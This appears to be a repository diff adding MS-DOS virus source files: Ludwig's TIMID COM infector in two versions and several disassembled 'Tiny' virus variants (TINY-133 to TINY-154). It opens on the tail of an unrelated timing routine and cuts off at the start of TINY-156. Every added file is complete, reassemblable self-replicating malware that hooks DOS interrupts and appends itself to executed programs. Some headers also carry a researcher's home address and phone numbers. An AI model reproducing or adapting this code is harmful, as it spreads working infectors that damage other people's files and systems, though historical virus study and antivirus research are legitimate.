MOV SYS_LOW,BX
SBB BX,DX
; BX: HAS MID 16 BITS OF DIFFERENCE
MOV DX,SYS_HI ;SWAP AND SUBTRACT
MOV SYS_HI,AX
SBB AX,DX
; AX: HAS HIGH 16 BITS OF DIFFERENCE
; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE
; ONLY PASS BACK 32 BITS AT PRESENT
; AS DX:AX
MOV AX,CX ;LOW 16 BITS
MOV DX,BX ;MID 16 BITS
POPF
POP ES
RET
_elaptime ENDP
END


195
MSDOS/Virus.MSDOS.Unknown.timid.asm Normal file
View File

@ -0,0 +1,195 @@
;TIMID VIRUS asm by Mark Ludwig in 1991.
;
;-infects .coms only in current directory unless called by dos path statement
;-announces each file infected.
;297bytes=eff. length
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
;Slightly modified for A86 assembly.
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
;-fixed bug in code reprinted in his book.
;all infected files will have VI at byte position 4-5.
;Mark Ludwig claims copyright on this virus and said he will
; sue anyone distributing his viruses around. I say have fun!.
main segment byte
assume cs:main, ds:main, ss:nothing
org 100h
host:
jmp near ptr virus_start
db 'VI' ;identifies virus
mov ah, 4ch
mov al, 0
int 21h
virus:
comfile db '*.com',0
virus_start:
call get_start
get_start:
sub word ptr [vir_start], offset get_start - offset virus
mov dx, offset dta
mov ah, 1ah
int 21h
call find_file
jnz exit_virus
call infect
mov dx, offset fname
mov [handle] b,24h
mov ah, 9
int 21h
exit_virus: ;bug was here in book
mov dx, 80h
mov ah, 1ah
int 21h
mov bx, [vir_start]
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
mov word ptr [host], ax
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
mov word ptr [host+2],ax
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
mov byte ptr [host+4], al
mov [vir_start], 100h
ret
start_code:
nop
nop
nop
nop
nop
find_file:
mov dx, [vir_start]
add dx, offset comfile-offset virus
mov cx, 3fh
mov ah, 4eh
int 21h
ff_loop:
or al,al
jnz ff_done
call file_ok
jz ff_done
mov ah, 4fh
int 21h
jmp ff_loop
ff_done:
ret
file_ok:
mov dx, offset fname
mov ax, 3d02h
int 21h
jc fok_nzend
mov bx, ax
push bx
mov cx, 5
mov dx, offset start_image
mov ah, 3fh
int 21h
pop bx
mov ah, 3eh
int 21h
mov ax, word ptr [fsize]
add ax, offset endvirus - offset virus
jc fok_nzend
cmp byte ptr [start_image], 0e9h
jnz fok_zend
fok_nzend:
mov al, 1
or al,al
ret
fok_zend:
xor al,al
ret
infect:
mov dx, offset fname
mov ax, 3d02h
int 21h
mov word ptr [handle],ax
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4202h
int 21h
mov cx, offset final -offset virus
mov dx, [vir_start]
mov bx, word ptr [handle]
mov ah, 40h
int 21h
xor cx,cx
mov dx, word ptr [fsize]
add dx, offset start_code-offset virus
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov cx, 5
mov bx, word ptr [handle]
mov dx, offset start_image
mov ah, 40h
int 21h
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov bx, [vir_start]
mov byte ptr [start_image], 0e9h
mov ax, word ptr [fsize]
add ax, offset virus_start-offset virus-3
mov word ptr [start_image+1], ax
mov word ptr [start_image+3], 4956h
mov cx, 5
mov dx, offset start_image
mov bx, word ptr [handle]
mov ah, 40h
int 21h
mov bx, word ptr [handle]
mov ah, 3eh
int 21h
ret
final:
;data area
endvirus equ $ + 212
org 0ff2ah
dta db 1ah dup (?)
fsize dw 0,0
fname db 13 dup (?)
handle dw 0
start_image db 0,0,0,0,0
vstack dw 50h dup (?)
vir_start dw (?)
main ends
end host
;end of timid.asm

210
MSDOS/Virus.MSDOS.Unknown.timid1.asm Normal file
View File

@ -0,0 +1,210 @@
;This program is a basic virus that infects just COM files. It gets the first
;five bytes of its host and stores them elsewhere in the program and puts a
;jump to it at the start, along with the letters "VI", which are used to
;by the virus to identify an already infected program.
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
ORG 100H
;This is a shell of a program which will release the virus into the system.
;All it does is jump to the virus routine, which does its job and returns to
;it, at which point it terminates to DOS.
HOST:
jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly
db 'VI'
mov ah,4CH
mov al,0
int 21H ;terminate normally with DOS
VIRUS: ;this is a label for the first byte of the virus
COMFILE DB '*.COM',0 ;search string for a com file
VIRUS_START:
call GET_START ;get start address - this is a trick to determine the location of the start of this program
GET_START: ;put the address of GET_START on the stack with the call,
sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS
mov dx,OFFSET DTA ;put DTA at the end of the virus for now
mov ah,1AH ;set new DTA function
int 21H
call FIND_FILE ;get a com file to attack
jnz EXIT_VIRUS ;returned nz - no file to infect, exit
call INFECT ;have a good COM file to use - infect it
mov dx,OFFSET FNAME ;display the name of the file just infected
mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it
mov ah,9
int 21H ;display it
EXIT_VIRUS:
mov dx,80H ;fix the DTA so that the host program doesn't
mov ah,1AH ;get confused and write over its data with
int 21H ;file i/o or something like that!
mov bx,[VIR_START] ;get the start address of the virus
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes
mov WORD PTR [HOST],ax ;of the COM file to their
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file
mov WORD PTR [HOST+2],ax
mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file
mov BYTE PTR [HOST+4],al
mov [VIR_START],100H ;set up stack to do return to host program
ret ;and return to host
START_CODE: ;move first 5 bytes from host program to here
nop ;nop's for the original assembly code
nop ;will work fine
nop
nop
nop
;--------------------------------------------------------------------------
;Find a file which passes FILE_OK
;
;This routine does a simple directory search to find a COM file in the
;current directory, to find a file for which FILE_OK returns with C reset.
;
FIND_FILE:
mov dx,[VIR_START]
; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it
mov cx,3FH ;search for any file, no matter what the attributes
mov ah,4EH ;do DOS search first function
int 21H
FF_LOOP:
or al,al ;is DOS return OK?
jnz FF_DONE ;no - quit with Z reset
call FILE_OK ;return ok - is this a good file to use?
jz FF_DONE ;yes - valid file found - exit with z set
mov ah,4FH ;not a valid file, so
int 21H ;do find next function
jmp FF_LOOP ;and go test next file for validity
FF_DONE:
ret
;--------------------------------------------------------------------------
;Function to determine whether the COM file specified in FNAME is useable.
;if so return z, else return nz.
;What makes a COM file useable?:
; a) There must be space for the virus without exceeding the
; 64 KByte file size limit.
; b) Bytes 0, 3 and 4 of the file are not a near jump op code,
; and 'V', 'I', respectively
;
FILE_OK:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc FOK_NZEND ;error opening file - quit and say this file can't be used
mov bx,ax ;put file handle in bx
push bx ;and save it on the stack
mov cx,5 ;next read 5 bytes at the start of the program
mov dx,OFFSET START_IMAGE ;and store them here
mov ah,3FH ;DOS read function
int 21H
pop bx ;restore the file handle
mov ah,3EH
int 21H ;and close the file
mov ax,WORD PTR [FSIZE] ;get the file size of the host
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it
jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K
cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code?
jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?
jnz FOK_ZEND ;no, file can be infected, return with Z set
FOK_NZEND:
mov al,1 ;we'd better not infect this file
or al,al ;so return with z reset
ret
FOK_ZEND:
xor al,al ;ok to infect, return with z set
ret
;--------------------------------------------------------------------------
;This routine moves the virus (this program) to the end of the COM file
;Basically, it just copies everything here to there, and then goes and
;adjusts the 5 bytes at the start of the program and the five bytes stored
;in memory.
;
INFECT:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
mov WORD PTR [HANDLE],ax ;and save the file handle here
xor cx,cx ;prepare to write virus on new file; positon file pointer
mov dx,cx ;cx:dx pointer = 0
mov bx,WORD PTR [HANDLE]
mov ax,4202H ;locate pointer to end DOS function
int 21H
mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write
mov dx,[VIR_START] ;ds:dx = place in memory to write from
mov bx,WORD PTR [HANDLE] ;bx = file handle
mov ah,40H ;DOS write function
int 21H
xor cx,cx ;now we have to go save the 5 bytes which came from the start of the
mov dx,WORD PTR [FSIZE] ;so position the file pointer
add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus
mov bx,WORD PTR [HANDLE]
mov ax,4200H ;and use DOS to position the file pointer
int 21H
mov cx,5 ;now go write START_CODE in the file
mov bx,WORD PTR [HANDLE] ;get file handle
mov dx,OFFSET START_IMAGE ;during the FILE_OK function above
mov ah,40H
int 21H
xor cx,cx ;now go back to the start of host program
mov dx,cx ;so we can put the jump to the virus in
mov bx,WORD PTR [HANDLE]
mov ax,4200H ;locate file pointer function
int 21H
mov bx,[VIR_START] ;calculate jump location for start of code
mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9
mov ax,WORD PTR [FSIZE] ;and then the relative address
add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area
mov WORD PTR [START_IMAGE+1],ax
mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in
mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE
mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE
mov bx,WORD PTR [HANDLE] ;file handle
mov ah,40H ;DOS write function
int 21H
mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack
mov ah,3EH ;and close file
int 21H
ret ;all done, the virus is transferred
FINAL: ;label for last byte of code to be kept in virus when it moves
ENDVIRUS EQU $ + 212 ;label for determining space needed by virus
;Note: 212 = FFFF - FF2A - 1 = size of data space
; $ gives approximate size of code required for virus
ORG 0FF2AH
DTA DB 1AH dup (?) ;this is a work area for the search function
FSIZE DW 0,0 ;file size storage area
FNAME DB 13 dup (?) ;area for file path
HANDLE DW 0 ;file handle
START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file
VSTACK DW 50H dup (?) ;stack for the virus program
VIR_START DW (?) ;start address of VIRUS (overlays the stack)
MAIN ENDS
END HOST


81
MSDOS/Virus.MSDOS.Unknown.tiny-133.asm Normal file
View File

@ -0,0 +1,81 @@
VSize = 085h
Code Segment
Assume CS:Code
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax bx dx ds es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ; Zero AH
cwd ; Zero DX
mov bx, si ; Move handle to BX
mov ds, ax ; Set DS and ES to 60h,
mov es, ax ; the virus data segment
mov ah, 3Fh ; Read first 4 bytes
int 69h
mov al, 4Dh
scasb ; Check for 4D5Ah or infected file mark
je Close ; .EXE or already infected
mov al, 2
call LSeek ; Seek to the end, SI now contains file size
mov cl, VSize ; Virus size in CX, prepare to write
int 69h ; AH is 40h, i.e. Write operation
mov ax, 0E94Dh ; Virus header in AX
stosw ; Store it
xchg ax, si ; Move file size in AX
stosw ; Complete JMP instruction
xchg ax, dx ; Zero AX
call LSeek ; Seek to the beginning
int 69h ; AH is 40h, write the virus header
Close: mov ah,3Eh ; Close the file
int 69h
EndExec: pop es ds dx bx ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ; Seek operation
cwd ; Zero DX
DoInt21: xor cx, cx ; External entry for Open, zero cx
int 69h
mov cl, 4 ; 4 bytes will be read/written
xchg ax, si ; Store AX in SI
mov ax, 4060h ; Prepare AH for Write
xor di, di ; Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End

162
MSDOS/Virus.MSDOS.Unknown.tiny-134.asm Normal file
View File

@ -0,0 +1,162 @@
page ,132
name TINY134
title The 'Tiny' virus, version TINY-134
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-134 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
; The original first 4 bytes of the infected file:
first4 db 0CDh, 20, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
call do_int21
jc end_exec ; Exit on error
cbw ; Zero AH
cwd ; Zero DX
mov bx,si ; Save handle in BX
mov ds,ax ; Set DS and ES to 60h,
mov es,ax ; the virus data segment
mov ah,3F ; Read the first 4 bytes
int 69
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
mov al,'M' ; Look for `M'
repne scasb
jz end_exec ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek ; SI now contains the file size
mov cl,v_len ; Length of virus body
int 69 ; Append the virus to the file (AH is now 40h)
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
inc si ; Add 1 to file size for the JMP
xchg ax,si ; Move it in AX
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
xchg ax,dx ; Zero AX
call lseek ; Seek to the beginning
int 69 ; AH is 40h, write the JMP instruction
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek:
mov ah,42 ; Seek operation
cwd ; Zero DX
do_int21:
xor cx,cx ; External entry for Open
int 69
mov cl,4 ; 4 bytes will be read/written
xchg ax,si ; Store AX in SI
mov ax,4060 ; Prepare AH for Write
xor di,di ; Zero DI
ret ; Done
v_end equ $ ; End of virus body
code ends
end start


168
MSDOS/Virus.MSDOS.Unknown.tiny-138.asm Normal file
View File

@ -0,0 +1,168 @@
page ,132
name TINY138
title The 'Tiny' virus, version TINY-138
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-138 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
call do_int21
jc end_exec ; Exit on error
cbw ; Zero AH
cwd ; Zero DX
mov bx,si ; Save handle in BX
mov ds,ax ; Set DS and ES to 60h,
mov es,ax ; the virus data segment
mov ah,3F ; Read the first 4 bytes
int 69
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
mov al,'M' ; Look for `M'
repne scasb
jz close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek ; SI now contains the file size
mov cl,v_len ; Length of virus body
int 69 ; Append the virus to the file (AH is now 40h)
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
inc si ; Add 1 to file size for the JMP
xchg ax,si ; Move it in AX
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
xchg ax,dx ; Zero AX
call lseek ; Seek to the beginning
int 69 ; AH is 40h, write the JMP instruction
close:
mov ah,3E ; Close the file
int 69
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek:
mov ah,42 ; Seek operation
cwd ; Zero DX
do_int21:
xor cx,cx ; External entry for Open
int 69
mov cl,4 ; 4 bytes will be read/written
xchg ax,si ; Store AX in SI
mov ax,4060 ; Prepare AH for Write
xor di,di ; Zero DI
ret ; Done
v_end equ $ ; End of virus body
code ends
end start


174
MSDOS/Virus.MSDOS.Unknown.tiny-143.asm Normal file
View File

@ -0,0 +1,174 @@
page ,132
name TINY143
title The 'Tiny' virus, version TINY-143
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-143 º
; º Disassembled by Vesselin Bontchev, August 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
int 69
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
call lseek1 ; Lseek to file beginning (and set CL to 4)
mov al,seg_60 shr 4 ; Read the first 4 bytes of the file
mov ds,ax ; Set buffer offset to 0060:0000h
mov es,ax ; Point ES there too
mov ah,3F
int 69 ; Do read
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
xor di,di
mov al,'M' ; Look for `M'
repne scasb
jz close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file (and put 4 in CL)
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append the virus to the file
int 69 ; Do it
call lseek1 ; Seek to the file beginning
xchg ax,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40 ; Overwrite the first 4 bytes of the file
int 69 ; Do it
close:
mov ah,3E ; Close the file
int 69
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek1:
mov al,0 ; Lseek to the file beginning
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 69 ; Do it
mov cl,4 ; Put 4 in CL
ret ; Done
v_end equ $ ; End of virus body
code ends
end start


182
MSDOS/Virus.MSDOS.Unknown.tiny-154.asm Normal file
View File

@ -0,0 +1,182 @@
page ,132
name TINY154
title The 'Tiny' virus, version TINY-154
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-154 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
call lseek1
mov ah,3F ; Read the first 4 bytes of the file
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
call lseek1 ; Seek to the file beginning
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
lseek1:
mov al,0 ; Lseek to file beginning
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dh,6 ; Put 6 in DH and 4 in CL
mov cl,4
ret ; Done
v_end equ $ ; End of virus body
code ends
end start


182
MSDOS/Virus.MSDOS.Unknown.tiny-156.asm Normal file
View File

@ -0,0 +1,182 @@
page ,132
name TINY156
title The 'Tiny' virus, version TINY-156
.radix 16
